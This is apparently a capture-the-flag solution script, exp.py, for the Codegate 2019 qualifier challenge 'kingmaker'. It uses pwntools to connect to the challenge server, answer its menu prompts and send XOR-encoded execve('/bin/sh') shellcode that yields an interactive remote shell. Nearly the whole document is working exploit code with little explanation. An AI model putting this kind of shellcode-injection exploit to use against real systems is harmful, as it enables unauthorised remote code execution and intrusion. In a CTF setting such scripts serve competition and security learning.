codegate 2019 qual: kingmaker execve

exp.py

from pwn import *

HOST, PORT = "110.10.147.104", 13152
# HOST, PORT = "0.0.0.0", 31338
r = remote(HOST, PORT)

ii = lambda x: r.sendline(str(x))
go = lambda x: (menu(), ii(x))[0]

ii("""1 lOv3 1 2
1
1 D0l1 1
1
2 1 HuNgRYT1m3
1
1 2
F0uRS3aS0n 1 1
""")
context.arch='amd64'
code = """
    /* execve(path='/bin///sh', argv=['sh'], envp=0) */
    /* push '/bin///sh\x00' */
    push 0x68
    xor eax, eax
    mov rax, 0x732f2f2f6e69622f
    push rax
    mov rdi, rsp
    /* push argument array ['sh\x00'] */
    /* push 'sh\x00' */
    push 0x1010101 ^ 0x6873
    xor dword ptr [rsp], 0x1010101
    xor esi, esi /* 0 */
    push rsi /* null terminate */
    push 8
    pop rsi
    add rsi, rsp
    push rsi /* 'sh\x00' */
    mov rsi, rsp
    xor edx, edx /* 0 */
    /* call execve() */
    push SYS_execve /* 0x3b */
    pop rax
    syscall


"""
xorkey=[ord(x)^ord(y) for x, y in zip('\x13x\xfc\xb7\x1b\xb0\x8ds\xb9\x13\xba\xb9\x00\xaa\xdaf\x95\xda}\x9e\x02\xb90\xbe\xd8&\x1f\t\x10n\xcdu\x89S\x83\xbad jNF\xbb`#\t\x13a\xd8u\x96G\xe0\xfcW5iAS\xbb{"jUR\xd8v\x95R\xe0\xe7Ci/rS\xb8t\x04jNF\xbb0\xa2R\xe3\xe8V|4f0\xfeG\x19iAS\xbb+\xaa1\xa5\xdbV\x0c;s0\xd1\x86t5R\xbb\xc5\x92\xac\xcf\xd1\xa6t5R\xbb\xdf\x92\xac\xcf\xe5{\x15/rS\xb8THjNF\xbbxC\t\x13a\xd8%i\x1c\x10u\xd9V\xce8s0/\xcf\xc94\xdb\xa3\xba\xa7\xec T\x060\xcdRS3a\xbb\xda\x9e\xb9\xcf\xcdRS3a\xbbI\x90\xb9\xcf',asm(code))]
xorkey = bytearray(xorkey)
print hexdump(xorkey)
assert all(x not in str(xorkey) for x in '\x00 \r\r\n\t')
solution="A"*5+'AWTQJMJXTSPPZVCIDGQYRDINMCP'
solution=solution.ljust(0xc0,'\x00')+xorkey+'\x00'
r.sendline(solution)
r.interactive()